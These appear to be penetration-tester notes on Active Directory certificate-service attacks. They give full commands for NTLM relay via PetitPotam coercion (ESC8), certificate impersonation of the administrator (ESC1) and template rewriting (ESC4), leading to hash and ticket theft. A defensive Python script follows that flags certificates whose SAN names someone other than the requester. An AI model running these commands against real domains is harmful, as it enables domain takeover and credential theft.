  1. ESC8
    1. Check the target is vulnerable to PetitPotam + ESC8, meaning:
      1. Web Enrollment is enabled
        1. certipy find -u USER -dc-ip IP -p PASS
        2. The output lists the ESC8 vulnerability
      2. Servers accept NTLM authentications (classic AD)
    2. Run Responder
    3. Use PetitPotam against the DC to coerce it into authenticating to Responder
    4. Machine hash gets leaked, can either crack or relay
    5. FOR RELAYING:
      1. ntlmrelayx -t http://CERTIFICATE_SERVER_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
        1. Get the certificate server IP by running certutil.exe
      2. Use PetitPotam
      3. Certificate gets leaked in ntlmrelayx
      4. Request a TGT with the certificate: gettgtpkinit.py -pfx-base64 $(cat b64-cert) 'DOMAIN/DCNAME$' 'ticket.ccache'
      5. Use ccache for secretsdump
  2. ESC1: when you can request a certificate while supplying another identity in the SAN (usually to spoof the administrator)
    1. Check ESC1 is present and Domain Users have enrollment rights:
      1. certipy find -dc-ip IP -u USER -p PASS
    2. Request a cert as the admin (-ca is the CA name and -target the CA host, both as reported by certipy find)
      1. certipy req -username USER@DOMAIN -password 'BadPass!' -ca CA_NAME -target CA_HOST -template 'TestUser' -upn administrator@DOMAIN -dc-ip IP -debug
      2. Get administrator_dc.pfx
    3. Use it to leak the admin hash
      1. certipy auth -dc-ip IP -pfx administrator_dc.pfx
  3. ESC4: you have write access to a template, so rewrite it to make it vulnerable; a chain from ESC4 to ESC1
    1. Check that the environment is vulnerable to ESC4
      1. certipy find -u USER -dc-ip IP -p PASS -text -output original
    2. Update existing template to enable ESC1 and save the original one
      1. certipy template -dc-ip IP -username USER -template 'Existing_Template' -save-old -p PASS
    3. Carry on with the ESC4 chain
      1. Re-run certipy find to verify the template now shows as vulnerable
  4. ESC3: a template carries high privileges that can be used to elevate your own
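From the defender's side, the ESC1 request above (and the ESC4 -> ESC1 chain) leaves a tell in the CA's issued-certificate data: the SAN UPN names a principal other than the requester. The following is an added audit example, not part of these notes or of certipy; it assumes the requester, template and SAN UPN have already been extracted per issued certificate (for instance from the CA database), and the records it scans are constructed.

```python
"""Flag issued certificates whose SAN UPN names someone other than the requester (ESC1 pattern)."""
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass
class IssuedCert:
    request_id: int
    requester: str            # as logged by the CA, e.g. "CORP\\jdoe" or "jdoe@corp.local"
    template: str
    san_upn: Optional[str]    # UPN from the SubjectAltName extension, if the CSR carried one


def principal(name: str) -> str:
    """Normalise 'DOMAIN\\user', 'user@domain' and bare 'user' to a lowercase 'user'."""
    name = name.strip().lower()
    if "\\" in name:
        name = name.rsplit("\\", 1)[1]
    if "@" in name:
        name = name.split("@", 1)[0]
    return name


def find_san_mismatches(records: Iterable[IssuedCert],
                        enrollment_agents: frozenset = frozenset()) -> List[Tuple[int, str, str]]:
    """Return (request_id, requester, san_upn) for every certificate whose SAN UPN
    does not match the requester. Accounts on the enrollment-agent allowlist are
    skipped, since they legitimately enroll on behalf of other users."""
    hits = []
    for r in records:
        if not r.san_upn:
            continue                                   # no SAN supplied: nothing to compare
        if principal(r.requester) in enrollment_agents:
            continue                                   # approved to request for others
        if principal(r.san_upn) != principal(r.requester):
            hits.append((r.request_id, r.requester, r.san_upn))
    return hits


# Constructed sample records, not real CA data.
SAMPLE = [
    IssuedCert(101, "CORP\\jdoe", "User", "jdoe@corp.local"),                   # normal self-enrollment
    IssuedCert(102, "CORP\\jdoe", "TestUser", "administrator@corp.local"),      # ESC1-style impersonation
    IssuedCert(103, "CORP\\DC01$", "DomainController", None),                   # no SAN in the request
    IssuedCert(104, "CORP\\svc-enroll", "EnrollmentAgentOffline", "hr.user@corp.local"),
    IssuedCert(105, "jdoe@corp.local", "TestUser", "JDoe@corp.local"),          # same user, different spelling
]

if __name__ == "__main__":
    for hit in find_san_mismatches(SAMPLE, enrollment_agents=frozenset({"svc-enroll"})):
        print("SAN/requester mismatch:", hit)
```

Record 104 is only suppressed because svc-enroll is on the allowlist; without it, an enrollment agent issuing for other users looks identical to ESC1 abuse, so the allowlist should hold only accounts that are actually granted enrollment-agent rights.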